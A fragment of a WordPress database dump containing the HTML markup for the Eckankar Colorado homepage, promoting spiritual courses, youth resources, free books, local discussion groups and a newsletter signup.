col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 38px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(233510,39646,'post_new_post_content','<?xml version=\"1.0\" standalone=\"no\"?>\r\n<svg xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"wave\" style=\"transform:rotate(0deg); transition: 0.3s; margin-top: -80px;\" viewBox=\"0 0 1440 100\" version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\"><defs><linearGradient id=\"sw-gradient-0\" x1=\"0\" x2=\"0\" y1=\"1\" y2=\"0\"><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"0%\"/><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"100%\"/></linearGradient></defs><path style=\"transform:translate(0, 0px); opacity:1\" fill=\"url(#sw-gradient-0)\" d=\"M0,10L60,18.3C120,27,240,43,360,41.7C480,40,600,20,720,10C840,0,960,0,1080,5C1200,10,1320,20,1440,23.3C1560,27,1680,23,1800,20C1920,17,2040,13,2160,15C2280,17,2400,23,2520,23.3C2640,23,2760,17,2880,11.7C3000,7,3120,3,3240,6.7C3360,10,3480,20,3600,28.3C3720,37,3840,43,3960,50C4080,57,4200,63,4320,56.7C4440,50,4560,30,4680,26.7C4800,23,4920,37,5040,41.7C5160,47,5280,43,5400,48.3C5520,53,5640,67,5760,75C5880,83,6000,87,6120,80C6240,73,6360,57,6480,41.7C6600,27,6720,13,6840,15C6960,17,7080,33,7200,33.3C7320,33,7440,17,7560,10C7680,3,7800,7,7920,10C8040,13,8160,17,8280,21.7C8400,27,8520,33,8580,36.7L8640,40L8640,100L8580,100C8520,100,8400,100,8280,100C8160,100,8040,100,7920,100C7800,100,7680,100,7560,100C7440,100,7320,100,7200,100C7080,100,6960,100,6840,100C6720,100,6600,100,6480,100C6360,100,6240,100,6120,100C6000,100,5880,100,5760,100C5640,100,5520,100,5400,100C5280,100,5160,100,5040,100C4920,100,4800,100,4680,100C4560,100,4440,100,4320,100C4200,100,4080,100,3960,100C3840,100,3720,100,3600,100C3480,100,3360,100,3240,100C3120,100,3000,100,2880,100C2760,100,2640,100,2520,100C2400,100,2280,100,2160,100C2040,100,1920,100,1800,100C1680,100,1560,100,1440,100C1320,100,1200,100,1080,100C960,100,840,100,720,100C600,100,480,100,360,100C240,100,120,100,60,100L0,100Z\"/></svg>\r\n\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;  z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" 